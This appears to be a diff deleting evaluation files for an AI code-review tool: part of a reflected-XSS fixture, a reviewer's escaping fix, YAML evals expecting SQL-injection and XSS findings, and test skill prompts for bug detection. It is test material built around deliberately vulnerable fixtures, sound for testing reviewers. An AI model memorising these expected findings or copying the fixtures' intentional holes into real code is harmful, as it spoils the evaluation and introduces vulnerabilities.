- .replace(/"/g, '&quot;');
39
- }
40
-
41
- interface SearchResult {
42
- items: { title: string; url: string }[];
43
- totalPages: number;
44
- }
45
-
46
- function performSearch(query: string, page: number): SearchResult {
47
- // Stub implementation
48
- return {
49
- items: [
50
- { title: `Result for "${query}" - item 1`, url: '/result/1' },
51
- { title: `Result for "${query}" - item 2`, url: '/result/2' },
52
- ],
53
- totalPages: Math.max(1, page),
54
- };
55
- }
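Reviewer sketch of escaping the reflected query before it reaches the HTML in this fixture. `renderQueryLine` is a hypothetical helper covering only the affected line of the template, and the single-quote replacement is an addition not present in the fixture's `escapeHtml`.

```typescript
// Escapes the characters that can break out of HTML text or attribute context.
function escapeHtml(text: string): string {
  return text
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;"); // addition: the fixture's helper leaves single quotes as-is
}

// The query is escaped at the point of interpolation, like the result titles already are.
function renderQueryLine(query: string): string {
  return `<p>Showing results for: <strong>${escapeHtml(query)}</strong></p>`;
}
```

With this in place a `<script>` payload in `q` is rendered as inert text instead of being parsed as markup.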
package/evals/precision.yaml DELETED
@@ -1,15 +0,0 @@
1
- skill: skills/precision.md
2
-
3
- evals:
4
- - name: ignores-style-issues
5
- given: functionally correct code with style issues (mixed naming conventions, verbose conditionals, magic numbers)
6
- files:
7
- - fixtures/ignores-style-issues/utils.ts
8
- should_find:
9
- - finding: "no bugs: the code is functionally correct despite having style issues, so zero or only info-level findings are expected"
10
- required: false
11
- should_not_find:
12
- - inconsistent naming convention (snake_case vs camelCase)
13
- - missing JSDoc comments
14
- - verbose conditional that could be simplified
15
- - magic numbers in discount calculation
package/evals/security-scanning.yaml DELETED
@@ -1,24 +0,0 @@
1
- skill: skills/security-scanning.md
2
-
3
- evals:
4
- - name: sql-injection
5
- given: SQL query built via string interpolation with user-supplied search parameters
6
- files:
7
- - fixtures/sql-injection/api.ts
8
- should_find:
9
- - finding: "SQL injection: user input from params.name, params.email, and params.role is directly interpolated into SQL query without parameterization"
10
- severity: critical
11
- should_not_find:
12
- - the getConnection helper implementation
13
- - missing email format validation as the primary issue
14
-
15
- - name: xss-reflected
16
- given: HTML template that renders URL query parameter directly into page without escaping
17
- files:
18
- - fixtures/xss-reflected/server.ts
19
- should_find:
20
- - finding: "reflected XSS: the query parameter from the URL is interpolated into HTML via template literal without calling escapeHtml()"
21
- severity: critical
22
- should_not_find:
23
- - hardcoded port number
24
- - missing HTTPS as the primary issue
package/evals/skills/bug-detection.md DELETED
@@ -1,33 +0,0 @@
1
- ---
2
- name: eval-bug-detection
3
- description: Test skill for bug detection evals. Finds logic errors, null handling bugs, async issues, and edge cases.
4
- ---
5
-
6
- You are an expert bug hunter analyzing code changes.
7
-
8
- ## What to Report
9
-
10
- Find bugs that will cause incorrect behavior at runtime:
11
-
12
- - Null/undefined property access without guards
13
- - Off-by-one and boundary errors
14
- - Missing await on async operations
15
- - Wrong comparison operators (< vs <=, && vs ||)
16
- - Stale closures capturing outdated values
17
- - Type coercion causing unexpected behavior
18
-
19
- ## What NOT to Report
20
-
21
- - Style or formatting preferences
22
- - Missing error handling that "might" matter
23
- - Performance concerns (unless causing incorrect behavior)
24
- - Unused variables or dead code
25
- - Missing tests or documentation
26
- - Security vulnerabilities (separate concern)
27
-
28
- ## Output Requirements
29
-
30
- For each bug, provide:
31
- - The exact file and line
32
- - What incorrect behavior occurs
33
- - What specific input or condition triggers it
package/evals/skills/precision.md DELETED
@@ -1,18 +0,0 @@
1
- ---
2
- name: eval-precision
3
- description: Test skill for precision evals. Only reports logic bugs, nothing else.
4
- ---
5
-
6
- You are a strict bug detector. You ONLY report provable logic bugs.
7
-
8
- ## Rules
9
-
10
- 1. Only report bugs that WILL cause incorrect behavior
11
- 2. You must be able to construct a specific input that triggers failure
12
- 3. Do NOT report style, formatting, naming, or documentation issues
13
- 4. Do NOT report missing error handling
14
- 5. Do NOT report performance concerns
15
- 6. Do NOT report security vulnerabilities
16
- 7. If the code is correct, return an empty findings array
17
-
18
- Be extremely conservative. When in doubt, do not report.